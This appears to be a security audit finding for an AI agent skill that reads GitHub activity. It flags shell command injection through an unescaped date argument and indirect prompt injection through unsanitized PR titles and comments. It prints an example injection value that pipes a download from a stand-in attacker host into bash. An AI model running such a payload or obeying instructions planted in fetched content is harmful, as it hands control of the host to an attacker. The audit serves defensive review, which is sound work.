The Agent Skills Directory

[COMMAND_EXECUTION]: The SKILL.md file defines a shell command that interpolates a variable directly into a bash call: bash $SKILL/scripts/fetch-github-activity.sh {date}. If the {date} input provided by a user or another agent is not strictly validated or escaped by the platform before interpolation, it could lead to arbitrary command execution on the host system (e.g., using a value like 2024-01-01; curl attacker.com/payload | bash). While the script scripts/fetch-github-activity.sh contains internal date validation, this check occurs after the shell has already parsed the command line, meaning it does not prevent injection at the invocation stage.
[PROMPT_INJECTION]: The skill exposes a surface for indirect prompt injection by ingesting untrusted data from GitHub and presenting it to the agent without sufficient safeguards.
Ingestion points: PR titles, body snippets, and comment bodies are fetched from the GitHub API within scripts/fetch-github-activity.sh.
Boundary markers: Absent. The instructions in SKILL.md do not use delimiters or include explicit instructions for the agent to ignore potential instructions embedded in the external data.
Capability inventory: The skill has the ability to execute shell commands (bash), interact with the GitHub CLI (gh), and process JSON (jq).
Sanitization: The script uses jq to structure the output and truncates text fields to specific lengths, but it does not sanitize the content of those fields for natural language instructions or malicious prompts.

read-github-activity